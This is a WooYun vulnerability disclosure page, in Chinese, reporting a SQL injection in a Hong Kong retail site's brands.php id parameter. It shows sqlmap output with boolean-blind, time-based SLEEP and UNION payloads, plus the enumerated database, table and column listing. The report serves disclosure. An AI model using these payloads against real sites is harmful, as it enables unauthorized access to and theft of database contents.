当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156815

漏洞标题:百客百貨 BaiKe Mall存在SQL注入的漏洞(香港地區)

相关厂商:百客百貨 BaiKe Mall

漏洞作者: 路人甲

提交时间:2015-12-01 11:29

修复时间:2016-01-15 16:38

公开时间:2016-01-15 16:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-01: 厂商已经确认,细节仅向厂商公开
2015-12-11: 细节向核心白帽子及相关领域专家公开
2015-12-21: 细节向普通白帽子公开
2015-12-31: 细节向实习白帽子公开
2016-01-15: 细节向公众公开

简要描述:

百客百貨 BaiKe Mall存在sql注入

详细说明:

百客百貨 BaiKe Mall存在sql注入
注入点:http://**.**.**.**/brands.php?id=9

sqlmap identified the following injection point(s) with a total of 43 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=9) AND 3139=3139 AND (2173=2173
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=9) AND (SELECT * FROM (SELECT(SLEEP(5)))KDuK) AND (9278=9278
    Type: UNION query
    Title: Generic UNION query (NULL) - 28 columns
    Payload: id=9) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787a71,0x715457644e436472766b,0x7171626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5.0.12
sqlmap identified the following injection point(s) with a total of 43 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=9) AND 5981=5981 AND (4742=4742
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=9) AND (SELECT * FROM (SELECT(SLEEP(5)))gUmE) AND (9365=9365
    Type: UNION query
    Title: Generic UNION query (NULL) - 28 columns
    Payload: id=9) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a6a71,0x776b614f7a7461774646,0x7170787871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5.0.12
current database:    'baikemal01'
current user is DBA:    False
available databases [2]:
[*] baikemal01
[*] information_schema


Database: baikemal01
+----------+---------+
| Table    | Entries |
+----------+---------+
| product  | 870     |
| invoice  | 763     |
| brands   | 80      |
| category | 36      |
| news     | 12      |
+----------+---------+
Table: product
[28 columns]
+------------+----------------+
| Column     | Type           |
+------------+----------------+
| availd     | varchar(1)     |
| bname      | varchar(100)   |
| booking    | varchar(100)   |
| brand      | varchar(2)     |
| category   | varchar(20)    |
| cname      | varchar(100)   |
| country    | varchar(10)    |
| cprice     | varchar(10)    |
| cpriceinfo | varchar(100)   |
| cpriceqty  | int(11)        |
| disprice   | varchar(100)   |
| is_video   | varchar(1)     |
| jancode    | varchar(20)    |
| new_pro    | varchar(100)   |
| offlink    | varchar(100)   |
| pdate      | timestamp      |
| pdecp      | varchar(500)   |
| pic        | varchar(100)   |
| pinfo      | varchar(500)   |
| pname      | varchar(100)   |
| pname_date | varchar(100)   |
| price      | varchar(10)    |
| remarks    | varchar(100)   |
| remarks2   | varchar(10000) |
| s_choice   | varchar(10)    |
| s_choice_y | varchar(1)     |
| soldout    | varchar(5)     |
| video      | varchar(5000)  |
+------------+----------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-12-01 16:37

厂商回复:

Referred to related parties.

最新状态:

暂无